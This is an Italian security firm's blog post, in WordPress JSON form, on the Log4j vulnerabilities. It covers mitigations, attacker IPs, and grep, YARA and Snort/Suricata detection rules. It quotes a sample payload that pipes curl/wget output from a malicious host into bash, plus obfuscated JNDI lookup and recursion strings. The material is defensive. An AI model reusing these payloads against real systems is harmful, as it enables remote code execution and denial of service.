{"id":4189,"date":"2021-12-13T15:23:11","date_gmt":"2021-12-13T15:23:11","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=4189"},"modified":"2023-09-16T10:59:45","modified_gmt":"2023-09-16T10:59:45","slug":"log4j-come-proteggere-i-sistemi","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/uncategorized-it\/log4j-come-proteggere-i-sistemi\/","title":{"rendered":"Log4j &#8211; Attacchi informatici e Difesa"},"content":{"rendered":"\n<p class=\"text-align:justify\">Durante le prime settimane di <strong>Dicembre 2021 <\/strong>sono stati rilevati degli attacchi che coinvolgono la <strong>libreria Apache Log4J<\/strong>. Il 12 Dicembre \u00e8 stato ufficialmente pubblicato un bollettino di sicurezza su una grave vulnerabilit\u00e0 di tipo <strong>Remote Command Execution<\/strong> <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\">CVE-2021-44228<\/a>.<\/p>\n\n\n\n<p>I <strong>sistemi vulnerabili esposti su rete pubblica<\/strong> sono da considerarsi <strong>compromessi <\/strong>a causa dell&#8217;attivit\u00e0 massiva di <em>exploitation <\/em>osservata in tutto il mondo.<\/p>\n\n\n\n<p>Apache Software Foundation ha gi\u00e0 rilasciato un <strong>aggiornamento di sicurezza<\/strong> <strong>di emergenza<\/strong> per corregge la vulnerabilit\u00e0 0-day, la versione che corregge il bug \u00e8 la <strong>2.15.0<\/strong>. <\/p>\n\n\n\n<p>Contestualmente alla pubblicazione della CVE-2021-44228 di Log4j 2 \u00e8 stata identificata una vulnerabilit\u00e0 simile per le versioni 1.x dello stesso prodotto, relativa alle configurazioni in cui \u00e8 previsto l&#8217;utilizzo della classe <strong>JMSAppender<\/strong>. La vulnerabilit\u00e0, identificata dalla <strong>CVE-2021-4104<\/strong>, in questo caso, non dipende quindi dall&#8217;input dell&#8217;utente, ma dalla configurazione adottata.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Aggiornamento del 20\/12\/2021<\/strong><\/h2>\n\n\n\n<p>Sono state identificate nuove vulnerabilit\u00e0 <strong>Log4j 2.15.0<\/strong> (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45046\">CVE-2021-45046<\/a>) e <strong>2.16.0<\/strong> (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45105\">CVE-2021-45105<\/a>) distribuite come patch per la versione vulnerabile (2.14.0). Si consiglia di applicare l&#8217;aggiornamento alla versione  <strong>2.17.0<\/strong>, che corregge i problemi di sicurezza rilevati nelle versioni precedenti.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>CVE<\/strong> <strong>2021-45046<\/strong><\/h3>\n\n\n\n<p>La patch per la vulnerabilit\u00e0 CVE-2021-44228 \u00e8 risultata incompleta, in quanto in alcune configurazioni non di default. Se le configurazioni di logging utilizzano un Pattern Layout non di default con un <strong>Context Lookup<\/strong> (ad esempio  $${ctx:loginId}), un attaccante con il controllo dei dati di input del <strong>Thread Context Map<\/strong> (MDC) pu\u00f2 passare dei dati appositamente costruiti usando un JNDI Lookup pattern, provocando in alcuni ambienti operativi un <strong>leak <\/strong>di informazioni e l&#8217;<strong>esecuzione remota di codice<\/strong>, e in tutti gli ambienti un&#8217;esecuzione di codice in locale. <br><br>Per porre rimedio a questa vulnerabilit\u00e0 Apache ha rilasciato la versione <strong>2.16.0 <\/strong>di Log4j.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>CVE<\/strong> <strong>2021-25105<\/strong><\/h3>\n\n\n\n<p>Le versioni di Log4j dalla 2.0-alpha1 fino alla 2.16.0 (tranne la 2.12.3) non forniscono protezione dalla <strong>ricorsione <\/strong>non controllata nei <strong>self-referential lookup<\/strong>. Un attaccante che dispone del controllo dei dati del Thread contex Map ha la possibilit\u00e0 di causare un <strong>Denial of Service<\/strong> (DoS). Questo accade nel caso in cui una stringa appositamente costruita viene interpretata (ad esempio: <strong>${${::-${::-$${::-j}}}}<\/strong>)   <\/p>\n\n\n\n<p>Per porre rimedio a questa vulnerabilit\u00e0 Apache ha rilasciato la versione <strong>2.17.0<\/strong> di Log4j.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/images.hothardware.com\/contentimages\/newsitem\/57029\/content\/Apache-Log4j-Logo.png\" alt=\"Apache Log4j Logo\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Identificare l&#8217;attacco e mitigare il rischio <\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#Grep\">Dai Log applicativi<\/a><\/li>\n\n\n\n<li><a href=\"#Yara\">Regola Yara<\/a><\/li>\n\n\n\n<li><a href=\"#Snort\">IDS Snort\/Suricata<\/a><\/li>\n\n\n\n<li><a href=\"#mitigazione\">Come mitigare il rischio<\/a><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">Paesi di origine delle scansioni<\/h3>\n\n\n\n<p>Di seguito una panoramica relativa agli indirizzi IP degli attaccanti:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1004\" height=\"421\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3.png\" alt=\"\" class=\"wp-image-4190\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3.png 1004w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3-300x126.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3-768x322.png 768w\" sizes=\"(max-width: 1004px) 100vw, 1004px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-text-align-center\" id=\"h-i-dettagli-della-vulnerabilita-e-dell-attacco\">I dettagli della Vulnerabilit\u00e0 e dell&#8217;attacco<\/h2>\n\n\n\n<p>I dettagli tecnici per l&#8217;identificazione, analisi e mitigazione del rischio compromissione.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Quali applicativi sono stati colpiti<\/h3>\n\n\n\n<p>Molti degli applicativi basati su Java sono vulnerabili, tra questi:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Elastic Search<\/li>\n\n\n\n<li>Elastic LogStash<\/li>\n\n\n\n<li>GrayLog2<\/li>\n\n\n\n<li>Minecraft (client and server)<\/li>\n\n\n\n<li>Neo4J<\/li>\n\n\n\n<li>Progetti Apache (Druid, Dubbo, Flink, Flume, Hadoop, Kafka, Solr, Spark, Struts, Tapestry, Wicket)<\/li>\n\n\n\n<li>Prodotti VMware (Horizon, vCenter, vRealize, HCX, NSX-T, UAG, Tanzu)<\/li>\n\n\n\n<li>Grails<\/li>\n\n\n\n<li>Prodotti java custom<\/li>\n\n\n\n<li>Redis<\/li>\n\n\n\n<li>Video games (e.g. Minecraft)<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-dettagli-vulnerabilita\">Dettagli vulnerabilit\u00e0<\/h2>\n\n\n\n<p>In tutte le versioni di Apache Log4j2 (fino alla 2.14.1) si utilizzano le API del <em><strong>Java Naming and Directory Interface<\/strong><\/em> (JNDI). Le funzionalit\u00e0, usate nella configurazione, nei messaggi di log e nei parametri, non proteggono da endpoint basati su LDAP e JNDI controllati da entit\u00e0 malevole. Per cui un attaccante&nbsp;in grado di controllare i messaggi di log o i parametri degli stessi pu\u00f2 <strong>eseguire codice arbitrario<\/strong> da server LDAP quando la funzionalit\u00e0 di sostituzione del contenuto dei messaggi (Message Lookup Substitution) \u00e8 abilitata. <br>Per sfruttare questa vulnerabilit\u00e0 gli aggressori possono inviare una <strong>richiesta HTTP <\/strong>contenente una stringa appositamente forgiata in modo da generare un log su Log4j il cui contenuto verr\u00e0 elaborato in una richiesta tramite interfaccia JNDI (Java Naming and Directory Interface) ad un server malevolo. <\/p>\n\n\n\n<p>L&#8217;elaborazione della risposta da parte del server malevolo nel sistema vulnerabile esegue il codice appositamente iniettato dall&#8217;aggressore.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"mitigazione\">Come mitigare la minaccia<\/h3>\n\n\n\n<p>Da log4j <strong>2.15.0<\/strong>, la funzionalit\u00e0 di lookup substitution dei messaggi \u00e8 disabilitata di default, per cui \u00e8 la soluzione pi\u00f9 semplice ed efficace. <\/p>\n\n\n\n<p>Altre possibili soluzioni sono:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nelle versioni precedenti, <strong>fino alla 2.10<\/strong> questa minaccia pu\u00f2 essere mitigata impostando le propriet\u00e0 di sistema:\n<ul class=\"wp-block-list\">\n<li><strong>log4j2.formatMsgNoLookups<\/strong> =<strong> <\/strong>true<\/li>\n\n\n\n<li><strong>LOG4J_FORMAT_MSG_NO_LOOKUPS<\/strong>=true<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nelle versioni <strong>precedenti alla 2.10<\/strong>, pu\u00f2 essere mitigata rimuovendo la classe <strong>JndiLookup<\/strong> class del classpath:\n<ul class=\"wp-block-list\">\n<li><strong>zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<\/strong>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In <strong>Java 8u121 <\/strong>impostare:\n<ul class=\"wp-block-list\">\n<li><strong>com.sun.jndi.rmi.object.trustURLCodebase<\/strong> = false<\/li>\n\n\n\n<li><strong>com.sun.jndi.cosnaming.object.trustURLCodebase<\/strong> = false<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Informazioni sugli attacchi in corso<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>L&#8217;interfaccia <strong>jndi <\/strong>utilizzata per ottenere (tramite protocollo specifico: dns, ldap, ecc..) l&#8217;oggetto java malevolo:<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"359\" height=\"214\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4.png\" alt=\"\" class=\"wp-image-4191\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4.png 359w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4-300x179.png 300w\" sizes=\"(max-width: 359px) 100vw, 359px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>Tutte le richieste contengono il payload malevolo (spesso nel campo <strong>User-agent <\/strong>o <strong>Referer<\/strong>)<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>La maggior parte dei <em>payload <\/em>sono codificati in Base64:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>(curl -s &lt;IP malevolo&gt;:&lt;Porta&gt;\/&lt;IP vittima&gt;:&lt;Porta vittima&gt;||wget -q -O- &lt;IP malevolo&gt;:&lt;Porta&gt;\/&lt;IP vittima&gt;:&lt;Porta vittima&gt;)|bash<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>URI utilizzati<\/strong><strong><\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>URI<\/strong> (da sfruttare per Detection)<\/td><\/tr><tr><td>\/Basic\/Command\/Base64\/&lt;Base64Code&gt;<\/td><\/tr><tr><td>\/a<\/td><\/tr><tr><td>\/callback<\/td><\/tr><tr><td>\/Exploit<\/td><\/tr><tr><td>\/epepap<\/td><\/tr><tr><td>\/b<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Metodi di offuscamento<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>${jndi:${lower:l}${lower:d}a${lower:p}:\/\/world80.log4j.bin${upper:a}ryedge.io:80\/callback}<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>IP degli attaccanti<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>159.65.194.103<\/li>\n\n\n\n<li>159.89.122.19<\/li>\n\n\n\n<li>165.22.213.246<\/li>\n\n\n\n<li>165.227.37.189<\/li>\n\n\n\n<li>167.172.44.255<\/li>\n\n\n\n<li>167.71.13.196<\/li>\n\n\n\n<li>167.99.186.227<\/li>\n\n\n\n<li>176.32.33.14<\/li>\n\n\n\n<li>178.17.174.14<\/li>\n\n\n\n<li>178.62.23.146<\/li>\n\n\n\n<li>195.54.160.149<\/li>\n\n\n\n<li>45.137.21.9<\/li>\n\n\n\n<li>45.155.205.233<\/li>\n\n\n\n<li>61.19.25.207<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Identificazione dell&#8217;attacco<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Grep\">Dai log applicativi<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo egrep -I -i -r '\\$(\\{|%7B)jndi:(ldap&#91;s]?|rmi|dns|nis|iiop|corba|nds|http):\/&#91;^\\n]+' \/var\/log\n\n\nsudo find \/var\/log -name \\*.gz -print0 | xargs -0 zgrep -E -i '\\$(\\{|%7B)jndi:(ldap&#91;s]?|rmi|dns|nis|iiop|corba|nds|http):\/&#91;^\\n]+'\n\n\nsudo find \/var\/log\/ -type f -exec sh -c \"cat {} | sed -e 's\/\\${lower:\/\/'g | tr -d '}' | egrep -I -i 'jndi:(ldap&#91;s]?|rmi|dns|nis|iiop|corba|nds|http):'\" \\;\n\n\nsudo find \/var\/log\/ -name '*.gz' -type f -exec sh -c \"zcat {} | sed -e 's\/\\${lower:\/\/'g | tr -d '}' | egrep -i 'jndi:(ldap&#91;s]?|rmi|dns|nis|iiop|corba|nds|http):'\" \\;\n\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Yara\">YARA<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>rule <strong>EXPL_Log4j_CVE_2021_44228_Dec21_Soft<\/strong> {\n   meta:\n      description = \"Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/h113sdx\/status\/1469010902183661568?s=20\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      $x1 = \"${jndi:ldap:\/\"\n      $x2 = \"${jndi:rmi:\/\"\n      $x3 = \"${jndi:ldaps:\/\"\n      $x4 = \"${jndi:dns:\/\"\n   condition:\n      1 of them\n}\n\n\nrule <strong>EXPL_Log4j_CVE_2021_44228_Dec21_Hard<\/strong> {\n   meta:\n      description = \"Detects indicators in server logs that indicate the exploitation of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/h113sdx\/status\/1469010902183661568?s=20\"\n      date = \"2021-12-10\"\n      score = 80\n   strings:\n$x1 = \/${jndi:(ldap|ldaps|rmi|dns):\/&#91;\/]? &#91;a-z-.0-9] {3,120}:&#91;0-9]{2,5}\/&#91;a-zA-Z.] {1,32}} \/\n$fp1r = \/(ldap|rmi|ldaps|dns):\/&#91;\/]? (127.0.0.1|192.168.| 172.&#91;1-3]&#91;0-9].| 10.)\/\n   condition:\n      $x1 and not 1 of ($fp*)\n}\n\n\nrule <strong>SUSP_Base64_Encoded_Exploit_Indicators_Dec21<\/strong> {\n   meta:\n      description = \"Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/Reelix\/status\/1469327487243071493\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      \/* curl -s  *\/\n      $sa1 = \"Y3VybCAtcy\"\n      $sa2 = \"N1cmwgLXMg\"\n      $sa3 = \"jdXJsIC1zI\"\n      \/* |wget -q -O-  *\/\n      $sb1 = \"fHdnZXQgLXEgLU8tI\"\n      $sb2 = \"x3Z2V0IC1xIC1PLS\"\n      $sb3 = \"8d2dldCAtcSAtTy0g\"\n   condition:\n      1 of ($sa*) and 1 of ($sb*)\n}\n\n\nrule <strong>SUSP_JDNIExploit_Indicators_Dec21<\/strong> {\n   meta:\n      description = \"Detects indicators of JDNI usage in log files and other payloads\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/github.com\/flypig5211\/JNDIExploit\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n$xr1 = \/ldap:\/\/&#91;a-zA-Z0-9.] {7,80}:&#91;0-9]{2, 5}\/(Basic\/Command\/Base64| Basic\/ReverseShell| Basic\/TomcatMemshell| Basic\/JBossMemshell| Basic\/WebsphereMemshell| Basic\/SpringMemshell| Basic\/Command| Deserialization\/CommonsCollectionsK| Deserialization\/CommonsBeanutils| Deserialization\/Jre8u20\/TomcatMemshell| Deserialization\/CVE_2020_2555\/WeblogicMemshell| TomcatBypass| GroovyBypass| WebsphereBypass)\/\/\n   condition:\n      filesize &lt; 100MB and $xr1\n}\n\n\nrule <strong>SUSP_EXPL_OBFUSC_Dec21_1<\/strong>{\n   meta:\n      description = \"Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/testanull\/status\/1469549425521348609\"\n      date = \"2021-12-11\"\n      score = 60\n   strings:\n      \/* ${lower:X} - single character match *\/\n      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }\n      \/* ${upper:X} - single character match *\/\n      $ = { 24 7B 75 70 70 65 72 3A ?? 7D }\n      \/* URL encoded lower - obfuscation in URL *\/\n      $ = \"$%7blower:\"\n      $ = \"$%7bupper:\"\n      $ = \"%24%7bjndi:\"\n      $ = \"\/$%7bjndi:\"\n   condition:\n      1 of them\n}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Snort\">Intrusion Detection: Snort\/Suricata <\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>alert http any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http ldap)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http rmi)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp ldap)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp rmi)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp rmi)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp ldap)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp dns)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp dns)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http dns)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp ldaps)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http ldaps)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ATTACK PAYLOAD<\/strong><\/h3>\n\n\n\n<p><a href=\"https:\/\/gist.github.com\/nathanqthai\/01808c569903f41a52e7e7b575caa890\">https:\/\/gist.github.com\/nathanqthai\/01808c569903f41a52e7e7b575caa890<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>C2 DOMAIN NAME<\/strong><\/h3>\n\n\n\n<p><a href=\"https:\/\/gist.github.com\/superducktoes\/9b742f7b44c71b4a0d19790228ce85d8\">https:\/\/gist.github.com\/superducktoes\/9b742f7b44c71b4a0d19790228ce85d8<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ATTACK IP<\/strong><\/h3>\n\n\n\n<p><a href=\"https:\/\/gist.github.com\/gnremy\/c546c7911d5f876f263309d7161a7217\">https:\/\/gist.github.com\/gnremy\/c546c7911d5f876f263309d7161a7217<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong><a href=\"https:\/\/fortgale.com\/servizi\/\">Informazioni sui servizi Fortgale<\/a><\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong><a href=\"https:\/\/fortgale.com\/contatti\/\">Contatti<\/a><\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Durante le prime settimane di Dicembre 2021 sono stati rilevati degli attacchi che coinvolgono la libreria Apache Log4J. Il 12 Dicembre \u00e8 stato ufficialmente pubblicato un bollettino di sicurezza su una grave vulnerabilit\u00e0 di tipo Remote Command Execution CVE-2021-44228. I sistemi vulnerabili esposti su rete pubblica sono da considerarsi compromessi a causa dell&#8217;attivit\u00e0 massiva di [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":4190,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[954],"tags":[1545,1547,1549,1551,1495],"class_list":["post-4189","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-it","tag-apache-it","tag-cve-2021-44228-it","tag-log4j-it","tag-rce-it","tag-vulnerability-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=4189"}],"version-history":[{"count":31,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189\/revisions"}],"predecessor-version":[{"id":6010,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189\/revisions\/6010"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/4190"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=4189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=4189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=4189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}